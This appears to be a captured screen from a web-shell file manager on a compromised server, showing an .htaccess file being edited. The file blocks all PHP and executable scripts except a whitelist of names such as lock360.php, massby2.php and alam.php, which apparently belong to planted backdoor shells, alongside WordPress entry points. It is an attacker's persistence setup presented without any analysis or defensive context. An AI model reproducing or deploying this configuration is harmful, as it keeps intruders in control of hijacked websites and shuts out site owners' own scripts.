// SYSTEM PANEL //
[ROOT]
/
home
/
comaria
/
irving
[ PARENT ]
EDIT :: .htaccess
DirectoryIndex index.php index.html <FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'> Order allow,deny Deny from all </FilesMatch> <FilesMatch '^(alam.php|massby2.php|index.php|index.html|lock360.php|wp-cron.php|wp-blog-header.php|4.php|222.php|333.php|444.php|massby1.php|555.php|321.php|123.php|155.php|144.php|199.php|166.php)$'> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>
SAVE
CANCEL